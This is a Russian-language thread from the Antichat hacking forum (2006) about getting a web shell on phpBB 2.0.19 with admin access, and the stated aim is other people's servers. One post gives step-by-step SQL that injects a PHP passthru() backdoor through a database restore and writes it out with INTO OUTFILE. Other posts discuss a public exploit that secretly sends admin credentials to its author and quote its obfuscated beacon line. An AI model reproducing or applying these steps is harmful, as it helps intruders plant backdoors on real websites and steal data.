HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB 2.0.19 + shell, если есть права админа
  #1  
Старый 13.06.2006, 21:51
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию phpBB 2.0.19 + shell, если есть права админа

Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа.
Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admi...?setmodules=00, но отображается пустая страница.....
 
Ответить с цитированием

  #2  
Старый 13.06.2006, 21:59
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию

А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
 
Ответить с цитированием

  #3  
Старый 13.06.2006, 22:53
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

Цитата:
Сообщение от DimaHbl4  
А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
Пробовал, но команды не выполняются, не знаю почему...
 
Ответить с цитированием

  #4  
Старый 13.06.2006, 22:39
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

кинь сцылку в пм, посмотрим что к чему
 
Ответить с цитированием

  #5  
Старый 13.06.2006, 23:21
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;

UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам!
 
Ответить с цитированием

  #6  
Старый 13.06.2006, 23:31
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?
 
Ответить с цитированием

  #7  
Старый 13.06.2006, 23:46
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию

А ты сплойт подправил? Там ids маячок стоит....
 
Ответить с цитированием

  #8  
Старый 13.06.2006, 23:58
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

Цитата:
Сообщение от DimaHbl4  
А ты сплойт подправил? Там ids маячок стоит....
А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль
 
Ответить с цитированием

  #9  
Старый 14.06.2006, 00:01
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию

Цитата:
А разве это как-то сказывается на его работе?
Кроме того что пароль и логин админа домой уходят никак ))))
 
Ответить с цитированием

  #10  
Старый 14.06.2006, 00:07
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

Цитата:
Сообщение от DimaHbl4  
Кроме того что пароль и логин админа домой уходят никак ))))
Всмысле домой - к рст?
Как почистить сплоит? Помогите
Могу просто удалить строчку
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?='.$ids);
Но будет ли он работать, а то тут что-то зашифровали
Цитата:
Сообщение от Dr.Check  
/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......
Работает в младших версиях, у меня открывает пустую страницу

Последний раз редактировалось Goudini; 14.06.2006 в 00:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Три теоремы об угоне автомобиля «Ана®xист» Электроника и Фрикинг 5 26.05.2009 23:05
SQL инъекция (в т.ч. и blind SQL) kot777 Уязвимости 4 04.10.2008 17:18
Как можно узнать пасс админа форума phpBB 2.0.19? Ozzakk Уязвимости CMS / форумов 3 30.05.2006 20:32
Есть доступ к сайту.Возможно ли создав юзвера(phpBB), повысить ему права до админа? :|| Уязвимости CMS / форумов 9 25.01.2006 13:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...